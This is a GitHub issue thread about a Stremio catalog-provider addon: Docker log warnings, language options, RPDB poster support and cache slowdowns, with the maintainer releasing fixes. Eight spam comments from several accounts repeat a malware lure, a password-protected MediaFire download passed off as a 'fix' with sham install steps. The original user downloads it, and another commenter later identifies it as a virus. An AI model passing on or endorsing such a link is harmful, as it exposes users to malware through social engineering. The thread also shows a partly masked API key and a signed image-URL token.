### ISSUE TITLE
Some error on docker logs.

### ISSUE THREAD

**Issue by ericvlog** [redd-ravenn/stremio-catalog-providers#1]
hello, just use compose to deploy....can open the configuration page with nginx proxy manager,.....and install on stremio.

stremio also have poster and looking good, I tested some show/movies on your catalog it have return with link.

but my docker logs show all

2024-08-27T07:24:51.525Z INFO: Cache hit for key [https://api.themoviedb.org/3/discover/tv?watch_region=US&with_watch_providers=2042&page=1&sort_by=popularity.desc&language=en&api_key=<s>b9ec03e24520c344670f7axxxxxxxxxx</s>](https://api.themoviedb.org/3/discover/tv?watch_region=US&with_watch_providers=2042&page=1&sort_by=popularity.desc&language=en&api_key=<s>b9ec03e24520c344670f7axxxxxxxxxxx</s>%3C/span%3E%3C/span%3E)

---
```
024-08-27T07:24:51.581Z INFO: --- Request received ---
2024-08-27T07:24:51.581Z WARN: Genre parameter is missing in extra
2024-08-27T07:24:51.582Z INFO: --- Request received ---
2024-08-27T07:24:51.583Z WARN: Genre parameter is missing in extra
2024-08-27T07:24:51.583Z INFO: --- Request received ---
2024-08-27T07:24:51.584Z WARN: Genre parameter is missing in extra
2024-08-27T07:24:51.585Z INFO: --- Request received ---
2024-08-27T07:24:51.585Z WARN: Genre parameter is missing in extra
```
are these is normal?

In docker I have setting zh`mandarin`, but at configuration page I cannot find `chinese` so I just select english.

you addon insane have alot of content, might implement rpdb rating posting? it now announce free for all tier user.

Thanks for wonderful addons.

![image](https://github.com/user-attachments/assets/7b7025e8-8e91-4b99-903a-bbf7832fcefc)

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by FoioMikael** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by praveenking945** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ericvlog** [comment]
> to fix your trouble try download this fix, i see it in another issue, https://app.mediafire.com/3ag3jpquii3of password: changeme when you installing, you need to place a check in install to path and select "gcc."

I already downloaded......I using stremio android tv, how i apply the fix? .......for gcc add inside docker-compose.yml ?
thanks.

**Comment by ericvlog** [comment]
I just test, it no showing on stremio android tv at all, only stremio windows working.

**Comment by aloncpp** [comment]
@ericvlog DELETE THIS NOW! it's a virus file!

**Comment by ericvlog** [comment]
> @ericvlog DELETE THIS NOW! it's a virus file!

Lol why this outcome.....

**Comment by aloncpp** [comment]
> > @ericvlog DELETE THIS NOW! it's a virus file!
> 
> Lol why this outcome.....

The URL link in the comment section is a virus file

**Comment by ericvlog** [comment]
> > > @ericvlog DELETE THIS NOW! it's a virus file!
> > 
> > 
> > Lol why this outcome.....
> 
> The URL link in the comment section is a virus file

then you should banned him....

**Comment by redd-ravenn** [comment]
@ericvlog Hi, thanks to you for your interest in the addon, it was published on Github to share it with a community fairly quickly in order to get feedback
It is not yet shared "officially" because I am still working on a lot of things
It is in an very early stage of development

Cache hit for key means that the request has already been processed once in the last 3 days (cache duration will be definable)
And so it serves the content directly from its cache

The "warn" logs are only there to warn that if it doesn't work, it's because of that, otherwise they can be completely ignored if everything goes well
Logs will be clearer once it is really ready

Regarding the missing languages, it's a mistake from me, in the next update they will all be available, it's already fixed

Integration of rpdb rating posting is planned, as well as Trakt so you can sync your history and it will remove items you've already viewed from catalogs

I have very little time at the moment to advance the addon but little by little all this will happen!

**Comment by redd-ravenn** [comment]
@ericvlog I just released a fix, all languages ​​are now available so you should be able to use the addon correctly now
![image](https://github.com/user-attachments/assets/2c2d2928-1ecb-4fd2-a2bc-0d78d0188047)

If you have any other questions, don't hesitate, if I was able to answer all your questions, let me know and I will close the issue

**Comment by ericvlog** [comment]
> @ericvlog I just released a fix, all languages ​​are now available so you should be able to use the addon correctly now ![image](https://private-user-images.githubusercontent.com/174155760/363315581-2c2d2928-1ecb-4fd2-a2bc-0d78d0188047.png?jwt=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmF3LmdpdGh1YnVzZXJjb250ZW50LmNvbSIsImtleSI6ImtleTUiLCJleHAiOjE3MjUxMDU2ODEsIm5iZiI6MTcyNTEwNTM4MSwicGF0aCI6Ii8xNzQxNTU3NjAvMzYzMzE1NTgxLTJjMmQyOTI4LTFlY2ItNGZkMi1hMmJjLTBkNzhkMDE4ODA0Ny5wbmc_WC1BbXotQWxnb3JpdGhtPUFXUzQtSE1BQy1TSEEyNTYmWC1BbXotQ3JlZGVudGlhbD1BS0lBVkNPRFlMU0E1M1BRSzRaQSUyRjIwMjQwODMxJTJGdXMtZWFzdC0xJTJGczMlMkZhd3M0X3JlcXVlc3QmWC1BbXotRGF0ZT0yMDI0MDgzMVQxMTU2MjFaJlgtQW16LUV4cGlyZXM9MzAwJlgtQW16LVNpZ25hdHVyZT05M2M0MTI5MzQzMTdhNDY1OWMyNzdhNDEzMDliOGY5YzZiNDM0ODFiMmI5MTE0OTMxMTJhNzZkMTdiNTFhNTFmJlgtQW16LVNpZ25lZEhlYWRlcnM9aG9zdCZhY3Rvcl9pZD0wJmtleV9pZD0wJnJlcG9faWQ9MCJ9.bj0Y-0VDnHX1PkbKHKEh0mk1mfTDp2-VY5bZHEKC3mU)
> 
> If you have any other questions, don't hesitate, if I was able to answer all your questions, let me know and I will close the issue

okay, glad to hear from you, Just now i test still no find mandarin in configuration page, btw i using docker compose and perform pull still haven't get latest image. maybe you still no push latest fix image.

thanks

**Comment by redd-ravenn** [comment]
@ericvlog I have not yet set up a workflow that updates the Docker image at the same time as the Github, my bad ahah
I just updated it manually

**Comment by ericvlog** [comment]
wow, bro u done a really amazing catalog add-ons , my site is smooth run without issue. 
If later intergrade with RPDB, it best catalog on stremio.

@jaruba
developer RPDB



![image](https://github.com/user-attachments/assets/510a0b47-9c65-41b5-af77-85fcb8b2a2b6)
![image](https://github.com/user-attachments/assets/dd420190-c264-49f7-98b9-244d8e3ab7e9)
![image](https://github.com/user-attachments/assets/fbe551cf-c66f-4dc5-908e-ee2aba3e2249)

**Comment by redd-ravenn** [comment]
@ericvlog hi, I think you will like the latest update 😉
And this time the docker image is up to date too, haha!
![image](https://github.com/user-attachments/assets/b4cb09c2-5a68-4416-a3d9-7c20a4748554)

This seems to slow down the addon enormously at times though, I don't know if this is the usual behavior with RPDB or if I have room for optimization
I will discuss it with the RPDB dev(s) as soon as I have a little more time

**Comment by ericvlog** [comment]
> @ericvlog hi, I think you will like the latest update 😉
> And this time the docker image is up to date too, haha!
> ![image](https://github.com/user-attachments/assets/b4cb09c2-5a68-4416-a3d9-7c20a4748554)
> 
> This seems to slow down the addon enormously at times though, I don't know if this is the usual behavior with RPDB or if I have room for optimization
> I will discuss it with the RPDB dev(s) as soon as I have a little more time
> 

Wow, I have update to latest version the language I select is wonderful show.

The RPDB cannot show maybe it needs wait stremio cache renew.

**Comment by redd-ravenn** [comment]
@ericvlog Yes it's due to the cache already present, you can delete the db folder at the root to force the update
And it can come from the local cache too (Stremio application, internet browser, etc.)
You can test the operation in private browsing to check that this is not the problem

**Comment by ericvlog** [comment]
> @ericvlog Yes it's due to the cache already present, you can delete the db folder at the root to force the update And it can come from the local cache too (Stremio application, internet browser, etc.) You can test the operation in private browsing to check that this is not the problem

I test on incognito with new login stremio also cannot get the rating working,

**Comment by redd-ravenn** [comment]
@ericvlog did you pull the latest docker image and delete the db folder containing the addon cache? Are you using a free or paid key? Do you still have queries available on this key? I deployed the addon several times including members of a discord community and they had no problems it must come from a configuration error try to explain your deployment process to me starting from scratch

**Comment by ericvlog** [comment]
> @ericvlog did you pull the latest docker image and delete the db folder containing the addon cache? Are you using a free or paid key? Do you still have queries available on this key? I deployed the addon several times including members of a discord community and they had no problems it must come from a configuration error try to explain your deployment process to me starting from scratch

Okay, I'll pull it now, btw where is the location of add-on cache because I no saw u map any volumes in compose.yml. 

Just use 'dorker compose down -v' enough?

The key is free tier but there is no limit by now should be.

**Comment by redd-ravenn** [comment]
@ericvlog I just tried with a free key and it actually doesn't work, it only works with the paid ones, I'm going to see that today
if you want to mount the db folder inside the container you can add a volume in docker compose like this:
```
    volumes:
      - /your/path/to/db:/usr/src/app/db
```

and you have to pull the new image after the down too

**Comment by ericvlog** [comment]
> @ericvlog I just tried with a free key and it actually doesn't work, it only works with the paid ones, I'm going to see that today
> if you want to mount the db folder inside the container you can add a volume in docker compose like this:
> ```
>     volumes:
>       - /your/path/to/db:/usr/src/app/db
> ```
> 
> and you have to pull the new image after the down too

Okay, It should work on the free tier also, just free no badge of 4k, 1080p.

Thanks for your guide.

**Comment by redd-ravenn** [comment]
@ericvlog that's it, it's fixed and pushed to docker & github

**Comment by ericvlog** [comment]
> @ericvlog that's it, it's fixed and pushed to docker & github

Wow thanks I will give it a try.

**Comment by ericvlog** [comment]
@redd-ravenn It working well now with my language !! thanks.

**Comment by redd-ravenn** [comment]
@ericvlog I'm glad to hear that it finally works for you, I just published a fix regarding RPDB, the slowness issues should be resolved, thanks to better response management and caching

**Comment by ericvlog** [comment]
looking like something is broken today, the RPDB no show and the loading is slow,

Is my only problem? , but I do restart the docker it remain same.

**Comment by redd-ravenn** [comment]
@ericvlog Make sure you're using the latest Docker Compose version with the `BASE_URL` environment variable properly configured. Delete the `db` folder and restart the container. If that doesn't work, redeploy it completely, as the latest fix includes changes that might cause issues with the old version.

On my end, I've also noticed a slowdown, but I haven't made any modifications since then, so I thought I might be rate-limited by the RPDB servers after my testing. I haven't received any other reports of problems about the few people using the addon daily.
I'll look at it more closely tomorrow and will keep you informed.

**Comment by ericvlog** [comment]
> @ericvlog Make sure you're using the latest Docker Compose version with the `BASE_URL` environment variable properly configured. Delete the `db` folder and restart the container. If that doesn't work, redeploy it completely, as the latest fix includes changes that might cause issues with the old version.
> 
> On my end, I've also noticed a slowdown, but I haven't made any modifications since then, so I thought I might be rate-limited by the RPDB servers after my testing. I haven't received any other reports of problems about the few people using the addon daily. I'll look at it more closely tomorrow and will keep you informed.

Hello,

The lag is caused by the `API Read Access Token` from TMDB, which changed unexpectedly without my notice. I noticed that the token in my Compose file differs from the one I inputted earlier.

However, the `API Key` in TMDB remains the same, so I will simply replace the old token in the Compose file with the new one. I'm not sure why the token changed automatically on the TMDB site.

**Comment by redd-ravenn** [comment]
@ericvlog Thank you for your feedback! 
I noticed a difference in speed between the free and paid keys for RPDB last night. I will run more tests today just to be sure. 
Also, the addon will soon switch to using API keys instead of tokens. The tokens were a temporary solution while the issue with the API keys, which hadn't been functioning for me since I created my account, was being resolved.

**Comment by ericvlog** [comment]
hello, at my site I found out, if the 1st time i running this catalog addon, it very fast,.....then i close stremio and reopen fresh with kill the stremio process the poster become very slow,

After I delete the `db` folder, and rerun the docker, it become fast. If now I close stremio totally and reopen it become slow.

Then need remove `db` folder again......just after cache it become more slow,.....I have change db folder 777 , root to my user also same.

Is only me?

**Comment by redd-ravenn** [comment]
@ericvlog Hi, normally, the cache is mainly meant to ease the load on the TMDB API
I think your connection might be faster between you and TMDB than between you and your addon's host maybe?

**Comment by ericvlog** [comment]
> @ericvlog Hi, normally, the cache is mainly meant to ease the load on the TMDB API
> I think your connection might be faster between you and TMDB than between you and your addon's host maybe?

Just ask in env is possible close the cache? Or any suggestions for me to investigate the problem?

Thank.

**Comment by redd-ravenn** [comment]
@ericvlog Hi, it's not possible at the moment, but I can set up an option for you. I'll get on it as soon as possible and let you know once it's published.  
A major update is coming soon, i'm working on it tonight, and if I finish, it will likely be published at the same time.

**Comment by redd-ravenn** [comment]
@ericvlog The major update is now published, including your parameter to completely disable the caching system. Be careful, there are a lot of changes. I recommend a complete redeployment and paying close attention to the new Docker Compose setup. There are fewer environment variables to configure, allowing for more modularity for users in the configuration page!

**Comment by ericvlog** [comment]
> @ericvlog The major update is now published, including your parameter to completely disable the caching system. Be careful, there are a lot of changes. I recommend a complete redeployment and paying close attention to the new Docker Compose setup. There are fewer environment variables to configure, allowing for more modularity for users in the configuration page!

Wow, will give it a detailed look and setup.

**Comment by ericvlog** [comment]
[2024-09-16 07:21:48] [ERROR]: Unhandled Rejection at: [object Promise], reason: TypeError: Cannot destructure property 'apiKey' of 'req.body' as it is undefined.

after i key in my api key, it just so long to load and then `Failed to fetch providers. Please check your API key and try again`

I use my second tmdb account api key also same.

**Comment by redd-ravenn** [comment]
@ericvlog Thank you for reporting this bug. A small line was missing on the main branch that I hadn't brought over from the dev branch... It's already fixed and published on GitHub and Docker. You can try again everything should be working now. Thanks for your involvement with the addon!
https://github.com/redd-ravenn/stremio-catalog-providers/commit/e5c7ce1a6fccb117896d7620e9fe68c6af501164

**Comment by ericvlog** [comment]
> @ericvlog Thank you for reporting this bug. A small line was missing on the main branch that I hadn't brought over from the dev branch... It's already fixed and published on GitHub and Docker. You can try again everything should be working now. Thanks for your involvement with the addon! [e5c7ce1](https://github.com/redd-ravenn/stremio-catalog-providers/commit/e5c7ce1a6fccb117896d7620e9fe68c6af501164)

Hello, it can install and run now, but something is missing, all film and show addons say `Can't get metadata for tt:12233434`
torrentio & my selfhost addon all same cannot get stream at all.

**Comment by redd-ravenn** [comment]
@ericvlog I think reactivating the cache will fix the issue. I must have forgotten to allow access to the metadata without the cache, and I believe that's where the problem lies. I’ll take care of it today.

The addon now handles the metadata for Stremio content as well, so there's no longer a need for Cinemeta or another complementary addon for specific language.

Some slowdowns might still be noticed,there's still room for optimization.

**Comment by ericvlog** [comment]
hello, the ` DISABLE_CACHE: true` option is available?

thanks

**Comment by redd-ravenn** [comment]
@ericvlog hi, I rolled back the recent changes that affected the addon (stremio metadata handling), as there were too many issues for a public release at this time. The catalog should now behave as it did before, so you shouldn't experience any slowdowns.

I spoke with another developer, and I’m considering implementing a Redis cache, which should resolve the issue if it persists. As a last resort, I could implement cache disabling, but ideally, the cache should reduce the load on the TMDB API and significantly speed up content access for the user.

It would be more useful to understand why you're experiencing slowdowns rather than bypassing the cache, as this is not normal behavior at all.

**Comment by ericvlog** [comment]
> @ericvlog hi, I rolled back the recent changes that affected the addon (stremio metadata handling), as there were too many issues for a public release at this time. The catalog should now behave as it did before, so you shouldn't experience any slowdowns.
> 
> I spoke with another developer, and I’m considering implementing a Redis cache, which should resolve the issue if it persists. As a last resort, I could implement cache disabling, but ideally, the cache should reduce the load on the TMDB API and significantly speed up content access for the user.
> 
> It would be more useful to understand why you're experiencing slowdowns rather than bypassing the cache, as this is not normal behavior at all.

I now know that the slow is no at the cache part, it RPDB , Now I just use without it, and loads very fast. hmmm.....
maybe need ask @jaruba 

Sorry I wrong give information about slow on cache.......

**Comment by redd-ravenn** [comment]
No problem, you’re one of the people who give me a lot of information and feedback, and I really appreciate that! I also noticed a slowdown with the free keys on the evening you reported the issue. I just tested it again, and it seems to be fixed for now, let’s see how it goes in the future! No issues with the paid tiers, not to advertise or anything, haha.

**Comment by ericvlog** [comment]
> No problem, you’re one of the people who give me a lot of information and feedback, and I really appreciate that! I also noticed a slowdown with the free keys on the evening you reported the issue. I just tested it again, and it seems to be fixed for now, let’s see how it goes in the future! No issues with the paid tiers, not to advertise or anything, haha.

I tested it, and there was no lag at all. The Trakt history check also worked on Windows. Is there still no public announcement for this addon? Once it is released, it will become the best catalog addon available!

**Comment by redd-ravenn** [comment]
Not yet, I'll do one for version 1.x.x. Currently, the vast majority of features are in place. What's mainly left is optimization across the board, especially making the cache system and database optimal.
Thanks for your enthusiasm, it makes me happy to see that the work done on the addon is appreciated!

**Comment by jaruba** [comment]
it's hard to follow this thread, but i did notice some RPDB poster slow downloads one night, i'll need to investigate as there are many parts of the infrastructure handling poster delivery, it could be anything really

i'm betting on some cloudflare service causing this, as i do use some experimental services from their side (but the point was to improve speed, not decrease it)

regarding paid vs free, the difference is that the free version has only one server dedicated to it, so requests are handled within the limits of that server, but i don't believe that server resources are the cause for this

**Comment by jaruba** [comment]
@redd-ravenn tell me if u encounter any more slow loading with RPDB, i stopped the use of a service just y-day that i suspect was the culprit
